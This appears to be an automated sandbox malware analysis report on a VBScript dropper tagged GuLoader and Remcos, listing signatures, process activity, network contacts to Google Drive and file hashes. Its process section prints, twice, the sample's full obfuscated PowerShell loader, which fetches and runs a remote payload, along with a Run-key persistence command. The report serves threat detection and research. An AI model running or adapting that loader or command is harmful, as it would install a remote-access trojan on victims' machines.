Malware Analysis Report

2025-01-02 03:18

Sample ID 240328-cgq8gsch4t
Target 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs
SHA256 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88
Tags
guloader downloader persistence remcos remotehost evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88

Threat Level: Known bad

The file 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence remcos remotehost evasion rat trojan

Remcos

UAC bypass

Guloader,Cloudeye

Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-28 02:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-28 02:03

Reported

2024-03-28 02:05

Platform

win7-20240221-en

Max time kernel

118s

Max time network

135s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1068 set thread context of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2300 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2300 wrote to memory of 2288 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2288 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2288 wrote to memory of 1732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2288 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1068 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 2004 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1068 wrote to memory of 2728 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2728 wrote to memory of 796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 796 wrote to memory of 584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 796 wrote to memory of 584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 796 wrote to memory of 584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 796 wrote to memory of 584 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 7b4fdea2a0af3dbb3e9af46780e69650
SHA1 de69a8afb30d505ddd396ef3a4e8a1f29a433365
SHA256 6b1fa76d82599968c89764e75052e8d79e5dd4b1b161729424cdc987c5c63b7b
SHA512 191950acaceeced7a8ad35f7c4e825e709088942b59b2d118b1b1b57fab6428a0247fe5528bcd55e5f2ec8fb64eb153152458db69f894c93a692bc42fe0f7820

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 114a16150326060e22136b52754269d6
SHA1 9922af44d5ae3aad88e7142110b374d62b1e286e
SHA256 430d09dee4de6ed578860cb29ce7bc18aa71cb3d7ecc3b74f6c34b018fbed64a
SHA512 10fcd67bfeaf39bc099ec43688c58c168067ea6690bf40ecf3163745ac9b3829b2a1f3075151580ee4d9162e41d0eb6114687a9a63aaff0ffbc5217306a9e232

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 02e4cd84d747bc2788747f9b1ed0d45d
SHA1 68e4f5b99283b18bac4b74a608594ee20798cef0
SHA256 8b2215111f242c2225e54c7bc4cc67ba46613865b8e6e017e9d15d35c3af798c
SHA512 5855bd9fa5a938f527dfcd403649481d6efe944afd633bb6608c87bc91b68fe3ba6bc7a3398e2dbb41f82ae33cddbc9f1427b6daeae3b84f26940d1c3c9c2e03

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KTYM4BI8JR78KGXSH5QW.temp

MD5 5f0b428ed695041590e46a7587e144c6
SHA1 7d68cc7eb810576da45019040b46283c02ebb542
SHA256 f7c80ee652946c684bf7677e088858754c9da6590888b00c7291dcd3a8de0c35
SHA512 c049e75aceecbe81827fee6fef4ed57453ab224980407f1d5e74a7337edf0b28ec36389e11f1fcc3f06c5bf28bfdf0242d5f0693a417dea8147cbff1f1ab4bf2

C:\Users\Admin\AppData\Local\Temp\Cab9E04.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5620b939b9fda048a3971e5d969ecf93
SHA1 ffe3b02a58f0018ee369942b91ca63198f6d0682
SHA256 6c951a8d3ab0185bf5d6dbf7fb73e39649b100e042ae13d5365b165e75384921
SHA512 619cdd150e4a4cea960c8da2a7d72612618bb4301e15472cc6edc3f7576bfd51392cb2d337ff1087c9c5028edb4b2e16eda2bc0103c10862837cd6cbd49946c7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2d875d17376dda9ceac84390a9755b6a
SHA1 c6dec0d91fa6d064125ea88e1b517f62a4b3b73a
SHA256 5f531025129209b1aea31a92b922752189c03fbf832f46832cf173dc49b9ff97
SHA512 946e4e18ab47a7c29d2a5bc00d7486eda9aeb350b78cb37738b275f6fca217a1c9e81829ec3cba978724a92bf3cac981820c65d5dfcf8485e89963dc2fb03710

C:\Users\Admin\AppData\Local\Temp\Tar4FD6.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-28 02:03

Reported

2024-03-28 02:05

Platform

win10v2004-20240226-en

Max time kernel

146s

Max time network

153s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Remcos

rat remcos

UAC bypass

evasion trojan
Description Indicator Process Target
